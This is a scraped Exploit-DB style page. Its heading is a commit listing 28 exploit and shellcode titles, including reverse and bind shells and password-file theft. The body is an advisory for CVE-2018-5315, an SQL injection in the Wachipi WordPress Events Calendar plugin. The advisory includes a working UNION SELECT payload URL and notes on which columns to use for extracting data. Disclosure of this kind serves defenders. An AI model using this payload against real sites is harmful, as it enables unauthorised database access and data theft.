a7ddd8282b
28 changes to exploits/shellcodes Multiple CPUs - Information Leak Using Speculative Execution Microsoft Edge Chakra JIT - 'Lowerer::LowerSetConcatStrMultiItem' Missing Integer Overflow Check Jungo Windriver 12.5.1 - Privilege Escalation DiskBoss Enterprise 8.8.16 - Buffer Overflow HPE iMC - dbman RestoreDBase Unauthenticated Remote Command Execution (Metasploit) HPE iMC - dbman RestartDB Unauthenticated Remote Command Execution (Metasploit) Synology Photostation 6.7.2-3429 - Remote Code Execution (Metasploit) Worpress Plugin Service Finder Booking < 3.2 - Local File Disclosure Muviko 1.1 - SQL Injection WordPress Plugin Events Calendar - 'event_id' SQL Injection WordPress Plugin Social Media Widget by Acurax 3.2.5 - Cross-Site Request Forgery WordPress Plugin CMS Tree Page View 1.4 - Cross-Site Request Forgery / Privilege Escalation WordPress Plugin Admin Menu Tree Page View 2.6.9 - Cross-Site Request Forgery / Privilege Escalation WordPress Plugin WordPress Download Manager 2.9.60 - Cross-Site Request Forgery Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting BSD/x86 - Bind TCP Shell (31337/TCP) + setuid(0) Shellcode (94 bytes) BSD/x86 - setuid(0) + Bind TCP Shell (31337/TCP) Shellcode (94 bytes) BSD/x86 - execve /bin/cat /etc/master.passwd | mail [email] Shellcode (92 bytes) BSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes) BSD/x86 - execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes) FreeBSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes) BSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes) FreeBSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes) Linux/x86 - execve /bin/dash Shellcode (30 bytes) Alpha - /bin/sh Shellcode (80 bytes) Alpha - execve() Shellcode (112 bytes) Alpha - setuid() Shellcode (156 bytes) BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes) Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)
53 lines
No EOL
1.3 KiB
Text
53 lines
No EOL
1.3 KiB
Text
# Exploit Title: Wichipi Events Calendar - SQL Injection
|
|
# Date: 09-01-2018
|
|
# Exploit Author: Dennis Veninga
|
|
# Contact Author: d.veninga [at] networking4all.com
|
|
# Vendor Homepage: codecanyon.net/user/wachipi
|
|
# Version: 1.0
|
|
# CVE-ID: CVE-2018-5315
|
|
|
|
Events Calendar allows you to easily add to your website a powerful
|
|
interactive calendar to present your events.
|
|
|
|
Found 09-01-18
|
|
Vendor reply & fix 09-01-2018
|
|
|
|
The Wachipi WP Events Calendar plugin 1.0 for WordPress has SQL Injection
|
|
via the event_id parameter to event.php.
|
|
|
|
NOTE: this plugin is NOT related to the Modern Tribe Events Calendar plugin.
|
|
|
|
[Additional Information]
|
|
http://
|
|
{TARGET}/event.php?event_id=-123%20union%20all%20select%201,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
|
|
|
|
[Vulnerability Type]
|
|
SQL Injection
|
|
|
|
[Vendor of Product]
|
|
https://codecanyon.net/item/wp-events-calendar-plugin/5025660 Wachipi
|
|
|
|
[Affected Product Code Base]
|
|
Events Calendar - 1.0
|
|
|
|
[Affected Component]
|
|
events.php
|
|
|
|
[Attack Type]
|
|
Remote
|
|
|
|
[Impact Code execution]
|
|
true
|
|
|
|
[Impact Escalation of Privileges]
|
|
true
|
|
|
|
[Impact Information Disclosure]
|
|
true
|
|
|
|
[Attack Vectors]
|
|
To exploit, union select 29 columns. User can use 2 or 25 for information
|
|
gathering.
|
|
|
|
[Discoverer]
|
|
Dennis Veninga @ Networking4all.com |